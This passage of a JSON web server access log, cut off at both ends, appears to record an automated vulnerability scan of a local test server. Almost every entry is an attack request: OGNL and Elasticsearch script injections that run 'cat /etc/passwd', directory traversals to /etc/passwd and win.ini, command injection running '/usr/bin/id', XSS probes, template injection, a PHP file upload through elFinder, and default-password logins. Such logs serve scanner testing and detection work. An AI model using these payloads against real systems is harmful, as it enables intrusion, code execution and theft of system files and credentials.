6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"{\x0D\x0A \x22query\x22: \x22{\x5Cnusers {\x5Cnedges {\x5Cn node {\x5Cn username\x5Cn email\x5Cn avatarUrl\x5Cn status {\x5Cn emoji\x5Cn message\x5Cn messageHtml\x5Cn }\x5Cn }\x5Cn }\x5Cn }\x5Cn }\x22,\x0D\x0A \x22variables\x22: null,\x0D\x0A \x22operationName\x22: null\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /user.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pki/images/keyManager_title.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bbpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=297MFuzebFcBUlo1Ltp4qQiB4Hg.php&target=l1_Lw HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"amty_hidden=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /haproxy-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chpstrt.php?chppath=Home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"{\x0D\x0A \x22size\x22: 1,\x0D\x0A \x22query\x22: {\x0D\x0A \x22filtered\x22: {\x0D\x0A \x22query\x22: {\x0D\x0A \x22match_all\x22: {\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A },\x0D\x0A \x22script_fields\x22: {\x0D\x0A \x22command\x22: {\x0D\x0A \x22script\x22: \x22import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getInputStream()).useDelimiter(\x5C\x22\x5C\x5C\x5C\x5CA\x5C\x22).next();\x22\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search?pretty HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22297MFuE2LIfN8RNHHP4qGYaZHKE%22%3b%20%3f%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_something_.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?a=display&templateFile=README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/sling/loginstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apimanui/api-manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /product-downloads/297MFuzebFcBUlo1Ltp4qQiB4Hg.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"{\x22email\x22:\x22invalid\x22,\x22signUpContext\x22:{},\x22secondaryEmail\x22:\x22\x22,\x22usingNewUi\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servicedesk/customer/user/signup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/sling/loginstatus.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_admin/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"{\x22name\x22:\x22\x22,\x22before\x22:\x22\x22,\x22after\x22:\x22\x22,\x22direction\x22:\x22desc\x22,\x22order_by\x22:\x22date\x22,\x22num_of_rows\x22:100}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-security-audit-log/failed-logins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///system///sling///loginstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /thruk/cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"127.0.0.1/thruk/cgi-bin/login.cgi?thruk", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) 